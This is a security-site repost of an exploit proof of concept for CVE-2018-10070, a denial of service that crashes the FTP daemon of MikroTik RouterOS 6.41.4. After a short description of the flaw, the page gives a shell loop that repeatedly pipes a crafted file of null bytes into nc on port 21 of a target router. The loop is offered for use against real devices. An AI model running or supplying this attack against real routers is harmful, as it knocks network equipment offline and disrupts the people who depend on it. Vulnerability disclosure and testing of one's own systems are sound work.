首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
MikroTik 6.41.4 - FTP daemon Denial of Service PoC
来源:vfocus.net 作者:Askari 发布时间:2018-04-16  

################
#Title: MikroTik 6.41.4 Denial of service FTP daemon crash
#CVE: CVE-2018-10070
#CWE: CWE-400
#Exploit Author: Hosein Askari (FarazPajohan)
#Vendor HomePage: https://mikrotik.com/
#Version : 6.41.4 (Released 2018-Apr-05) | All Version
#Date: 13-05-2018
#Category: Network Appliance
#Description: A vulnerability in MikroTik Version 6.41.4 could allow an unauthenticated remote attacker to exhaust all available CPU and all available RAM by sending crafted FTP requests on port 21 that begins with many '\0' characters, #preventing the affected router from accepting new FTP connections. The router will reboot after 10 minutes, logging a "router was rebooted without proper shutdown" message.
#POC: https://vimeo.com/264461602
################

for i in `seq 1 100`

do
  cat craft |  nc -nv <MikroTik IP> 21 &
  sleep 2
done


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Yahoo! Messenger Webcam 8.1 Ac
·Apache 2.2.0 - 2.2.11 Remote e
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
·HT Editor File openning Stack
  相关文章
·Drupal < 7.58 / < 8.3.9 / < 8.
·GNU Beep 1.3 - 'HoleyBeep' Loc
·Drupal < 7.58 / < 8.3.9 / < 8.
·F5 BIG-IP 11.6 SSL Virtual Ser
·SysGauge Pro 4.6.12 Local Buff
·Google Chrome V8 JIT - 'LoadEl
·DVD X Player Standard 5.5.3.9
·CyberArk Password Vault Web Ac
·CyberArk Password Vault < 9.7
·GoldWave 5.70 - Local Buffer O
·H2 Database - 'Alias' Arbitrar
·SSH / SSL RSA Private Key Pass
  推荐广告
CopyRight © 2002-2018 VFocuS.Net All Rights Reserved